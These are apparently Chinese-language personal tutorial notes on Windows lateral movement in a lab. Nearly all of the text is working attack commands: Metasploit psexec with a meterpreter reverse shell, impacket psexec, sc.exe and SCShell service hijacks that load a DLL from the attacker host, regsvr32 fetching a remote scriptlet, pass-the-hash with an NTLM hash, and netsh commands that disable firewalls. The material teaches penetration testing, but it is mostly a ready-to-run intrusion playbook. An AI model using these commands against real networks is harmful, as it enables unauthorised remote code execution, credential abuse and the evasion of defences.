横向移动手法介绍教程

https://www.bilibili.com/video/BV1Hz4y1Z7pJ
https://www.bilibili.com/video/BV1Hz4y1Z7pJ?p=2
https://www.bilibili.com/video/BV1Hz4y1Z7pJ?p=3

smbmap信息搜集

远程管理必须使用Admin$

查看远程共享

smbmap -H 192.168.123.45

smbmap -u administrator -p 123456 -d workgroup -H 192.168.123.45

msf psexec （成功，不免杀，开启防火墙则无效）

使用的是139，445端口，目标机器必须开放这个端口。

1. impacket-smbserver
2. msf psexec

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.123.45
set LPORT <Local Port>
set LHOST <Local IP>
set SMBUSER <local admin username>
set SMBPASS <local admin password>
exploit

漏洞利用，使用口令去进行命令执行 mimikatz，windows明文密码放在桌面，暴力破解，

psexec.py（成功，不免杀，开启防火墙则无效）

python /usr/share/doc/python-impacket/examples/psexec.py workgroup/administrator@192.168.123.45 cmd.exe

sc.exe （成功，开启防火墙也有效，不免杀）

开启rundll32的反弹shell监听服务器，不会的可以看这个视频：https://www.bilibili.com/video/BV1ey4y1k7PA/

激活管理员账号
net user administrator /active:yes

net use \192.168.123.45\admin$ /user:"administrator" "123456"

net use \192.168.123.45\admin$ /del

net share可以查看本机开放的资源

sc \192.168.123.45 create whaleReverse15 binpath= "C:\windows\system32\cmd.exe /c C:\windows\system32\rundll32.exe \192.168.123.123\Azye\test.dll,0"

sc \192.168.123.45 start whaleReverse15

csexec（能过360，但不能过windows防火墙）

net user administrator 123456
net use \192.168.28.1\admin$ /user:"administrator" "qwf123!!"
csexec.exe \192.168.28.1 cmd.exe
操作超时

net use \192.168.123.45\admin$ /user:"administrator" "123456"
csexec.exe \192.168.123.45 cmd.exe
没有安装./net2

net use \192.168.123.184\admin$ /user:"administrator" "123456"
csexec.exe \192.168.123.45 cmd.exe

用法有点复杂，没有继续看的工具

scshell

使用这篇反弹shell “https://whale3070.github.io/tools/2020/10/04/11-x/”中提到的Regsvr32.exe

regsvr32 /s /n /u /i:http://192.168.123.123:8080/6IEDA48otwgL.sct
生成一个注册表

SCShell.exe 192.168.123.45 filepermsvc "C:\windows\system32\cmd.exe /c C:\windows\system32\rundll32.exe \192.168.123.123\rDAEep\test.dll,0" . administrastor 123456

regsvr32 /s /n /u /i:http://192.168.123.123:8080/6IEDA48otwgL.sct scrobj.dll
rundll32.exe \192.168.123.123\MJear\test.dll,0

python scshell.py -target-ip 192.168.123.45 -service-name filepermsvc -no-cmd " C:\windows\system32\rundll32.exe \192.168.123.123\rDAEep\test.dll,0" . administrastor 123456

SharpMove.exe action=query computername=192.168.123.45 query="filepermsvc" username=administrastor password=123456

SCShell.exe 192.168.123.45 filepermsvc "C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj" . administrator 123456

2020.10.07

python3 scshell.py WORKGROUP/WIN-U8OIU3QM15C@192.168.123.45 -hashes aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71
C:\windows\system32\cmd.exe /c C:\windows\system32\rundll32.exe \192.168.123.123\wLWQND\test.dll,0

原理：

sc config filepermsvc binpath= "C:\windows\system32\cmd.exe /c C:\windows\system32\rundll32.exe 
\192.168.123.123\wLWQND\test.dll,0"

目标机器本地执行成功
C:\Users\Administrator\Desktop\SCShell.exe local filepermsvc "C:\windows\system32\cmd.exe /c C:\windows\system32\rundll32.exe \192.168.123.123\hltzs\test.dll,0" . administrator 123456

攻击机器执行：
D:\文件同步\tmp\横向移动参考资料\工具\SCShell-master\SCShell-master\SCShell.exe 192.168.123.45 filepermsvc "C:\windows\system32\cmd.exe /c C:\windows\system32\rundll32.exe \192.168.123.123\hltzs\test.dll,0" . administrator 123456

sharpmove

SharpMove.exe action=startservice computername=remote.host.local servicename=TestService

关闭防火墙命令

关闭公网上的防火墙 netsh advfirewall set currentprofile state off

关闭内网中的防火墙 netsh advfirewall set privateprofile state off

远程关闭防火墙

netsh -r 192.168.123.45 -u administrator -p 123456 -c advfirewall set allprofiles state on

https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior

https://www.windows-commandline.com/enable-disable-firewall-command-line/

参考资料

https://pentestlab.blog/2020/07/21/lateral-movement-services/

https://github.com/Mr-Un1k0d3r/SCShell

https://github.com/0xthirteen/MoveKit

https://github.com/0xthirteen/SharpMove

https://github.com/0xthirteen/SharpRDP